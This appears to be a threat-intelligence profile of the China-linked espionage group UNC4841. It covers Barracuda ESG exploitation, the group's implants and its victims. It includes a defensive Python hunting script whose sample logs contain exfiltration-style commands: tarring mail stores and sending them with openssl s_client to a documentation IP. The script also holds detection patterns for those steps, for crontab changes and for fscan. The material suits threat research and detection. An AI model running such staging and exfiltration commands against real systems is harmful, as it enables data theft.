UNC4841
UNC4841 is a suspected Chinese cyber-espionage threat actor, assessed by Mandiant as operating in support of the People’s Republic of China (PRC). The group is associated with long-term espionage activity across multiple regions and sectors and is known for favoring internet-facing edge devices as an access vector. The only alias directly provided in the content for this actor is UNC4841.

UNC4841 is best known for exploiting the Barracuda Email Security Gateway (ESG) zero-day vulnerability CVE-2023-2868, with exploitation reported as active since at least October 2022, to gain access to networks and conduct long-term espionage. Reporting also notes follow-on exploitation of CVE-2023-7102 in Barracuda ESG appliances.

In the Barracuda ESG campaign, UNC4841 deployed custom malware including SALTWATER, SEASPY, and SEASIDE. SALTWATER is a backdoor module for the Barracuda SMTP daemon (bsmtpd) that supports file upload/download, command execution, proxying, and tunneling; it was deployed with time-stomping to hide activity. SEASIDE is a Lua-based bsmtpd module that monitors SMTP HELO/EHLO commands, decodes an encoded C2 address and port, and launches the WHIRLPOOL reverse shell utility. Mandiant also identified trojanized Lua modules associated with SEASPRAY and SKIPJACK, as well as SANDBAR, a Linux rootkit used to hide processes.

Persistence mechanisms included cron jobs, init script modification, insertion of execution commands into a Perl update script, and deployment of a kernel module loaded at startup. UNC4841 staged email-related data into .tar.gz archives under /mail/tmp/ and exfiltrated them over TLS using openssl s_client; in limited cases it used anonfiles. Mandiant also observed limited reconnaissance using the open-source fscan tool.

Victimology spans public and private sector organizations worldwide. Reporting states attacks affected multiple regions and sectors, with one-third of Barracuda ESG victims reportedly government agencies from at least 16 countries. Targeted collection included academics in Taiwan and Hong Kong and Asian and European government officials in Southeast Asia. Reporting also links UNC4841 exploitation of Barracuda ESG appliances to espionage activity affecting Belgium’s VSSE.

Additional reporting notes infrastructure overlap and similar TTPs with Salt Typhoon, including use of 45 domains registered as early as May 2020 to facilitate cyber-espionage operations. Mandiant assessed that the observed overlaps likely indicate shared infrastructure procurement support rather than the same operators.
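The post-exploitation behaviours listed above (archives staged under /mail/tmp/, TLS exfiltration with openssl s_client, cron-based persistence, fscan reconnaissance) translate directly into host-level hunting logic. The script below is an added example written for this profile; it is not Mandiant's, Barracuda's or Mallory's code. It assumes a simplified "timestamp host user command" process-execution log format (an assumption standing in for auditd, EDR or syslog telemetry from the appliance), uses constructed sample events with an RFC 5737 documentation address, and shows why the staging-then-s_client sequence on one host is a stronger signal than either command alone.

```python
import re
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Dict, List, Optional

# Constructed sample process-execution events in an assumed
# "<ISO-8601 timestamp> <host> <user> <command line>" format. This is an
# illustrative schema, not the Barracuda ESG's real log format; adapt
# parse_event() to whatever telemetry (auditd, EDR, syslog) is available.
SAMPLE_EVENTS = [
    "2023-05-30T02:14:07Z esg01 root tar -czf /mail/tmp/mstore_dump.tar.gz /mail/mstore",
    "2023-05-30T02:15:11Z esg01 root openssl s_client -quiet -connect 203.0.113.45:443",
    "2023-05-30T02:40:00Z esg01 root crontab /tmp/.cron",
    "2023-05-30T03:05:22Z esg01 root /tmp/fscan -h 10.0.0.0/24",
    "2023-05-30T03:10:00Z esg01 root openssl version",
    "2023-05-30T04:00:00Z esg02 root /usr/sbin/logrotate /etc/logrotate.conf",
    "2023-05-31T09:00:00Z esg02 admin openssl s_client -connect mail.example.net:25 -starttls smtp",
]

# Behaviours named in the UNC4841 reporting, expressed as command-line
# patterns. Each one alone is a lead, not a verdict (openssl s_client has
# legitimate administrative uses), hence the correlation step further down.
RULES: Dict[str, re.Pattern] = {
    "staging_archive_in_mail_tmp": re.compile(r"\btar\b.*\s/mail/tmp/\S+\.tar\.gz"),
    "openssl_s_client": re.compile(r"\bopenssl\s+s_client\b"),
    "cron_modification": re.compile(r"\bcrontab\b|/var/spool/cron|/etc/cron"),
    "fscan_execution": re.compile(r"(?:^|/|\s)fscan(?:\s|$)"),
}


@dataclass
class Event:
    ts: datetime
    host: str
    user: str
    cmd: str


def parse_event(line: str) -> Optional[Event]:
    """Parse one line of the assumed format; return None for malformed lines."""
    parts = line.strip().split(maxsplit=3)
    if len(parts) != 4:
        return None
    try:
        ts = datetime.strptime(parts[0], "%Y-%m-%dT%H:%M:%SZ")
    except ValueError:
        return None
    return Event(ts=ts, host=parts[1], user=parts[2], cmd=parts[3])


def match_rules(events: List[Event]) -> Dict[str, List[Event]]:
    """Bucket events under every rule whose pattern matches the command line."""
    hits: Dict[str, List[Event]] = {name: [] for name in RULES}
    for ev in events:
        for name, pattern in RULES.items():
            if pattern.search(ev.cmd):
                hits[name].append(ev)
    return hits


def correlate_staging_exfil(hits: Dict[str, List[Event]],
                            window: timedelta = timedelta(minutes=30)) -> List[dict]:
    """Pair an archive written to /mail/tmp/ with an openssl s_client run on
    the same host shortly afterwards: the staging-then-TLS-exfil sequence the
    reporting describes, which is far more specific than either event alone."""
    findings = []
    for stage in hits["staging_archive_in_mail_tmp"]:
        for exfil in hits["openssl_s_client"]:
            if exfil.host == stage.host and stage.ts < exfil.ts <= stage.ts + window:
                findings.append({
                    "host": stage.host,
                    "staged_at": stage.ts.isoformat(),
                    "exfil_at": exfil.ts.isoformat(),
                    "archive_cmd": stage.cmd,
                    "exfil_cmd": exfil.cmd,
                })
    return findings


def hunt(lines: List[str]) -> dict:
    """Run the single-event rules and the correlation over raw log lines."""
    events = [ev for ev in (parse_event(line) for line in lines) if ev is not None]
    hits = match_rules(events)
    return {"hits": hits, "staging_then_exfil": correlate_staging_exfil(hits)}


if __name__ == "__main__":
    result = hunt(SAMPLE_EVENTS)
    for name, evs in result["hits"].items():
        for ev in evs:
            print(f"[{name}] {ev.ts.isoformat()} {ev.host} {ev.user}: {ev.cmd}")
    for f in result["staging_then_exfil"]:
        print(f"[HIGH] {f['host']}: archive staged {f['staged_at']}, TLS client at {f['exfil_at']}")
```

On the constructed input the single-event rules fire on the tar, two openssl s_client, crontab and fscan lines while ignoring "openssl version" and logrotate; only esg01, where the archive precedes the TLS client by about a minute, produces the high-confidence correlated finding, and the admin's STARTTLS test on esg02 stays a low-severity lead. The 30-minute window and the rule set are tuning knobs, not values taken from the reporting.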
Tradecraft
20 distinct techniques observed across reporting, grouped by tactic.
Associated malware families
8 malware families attributed to this actor across reporting.
3 additional families tracked in Mallory.
Associated vulnerabilities
2 CVEs this actor has used in observed campaigns, both exploited in the wild.
...UNC4841 exploited Barracuda ESG zero-day vulnerabilities... malicious email attachments to trigger remote command injection in the ESG attachment-scanning component (CVE-2023-2868)... Crafted .tar archives abused Perl’s qx operator to execute arbitrary system commands...
Barracuda later disclosed follow-on exploitation of CVE-2023-7102 in the Spreadsheet::ParseExcel library, again via malicious Excel attachments, to reinstall updated SEASPY and SALTWATER variants after initial remediation.
Observables
32 indicators attributed to this actor: domains, IPs, hashes, and other artifacts pulled from reporting.
Recent activity
17 sources tracked across advisories, community write-ups, and news.
China-nexus espionage activity exploiting Barracuda Email Security Gateway (ESG) vulnerabilities (notably CVE-2023-2868 and later CVE-2023-7102) via malicious attachments to gain code execution on ESG appliances, then deploying bespoke implants (SALTWATER, SEASPY, SEASIDE) for persistence, command execution, tunneling, and exfiltration; linked to compromise of Belgium’s VSSE email flows.
China-nexus espionage activity exploiting Barracuda Email Security Gateway (ESG) vulnerabilities (including CVE-2023-2868 and later CVE-2023-7102) via malicious attachments to gain and maintain persistent access to email gateway infrastructure, enabling long-term collection/exfiltration (including reported compromise of Belgium’s VSSE email flows).
China-linked cluster associated with infrastructure (domains) tied to Salt Typhoon activity; details not expanded in provided content.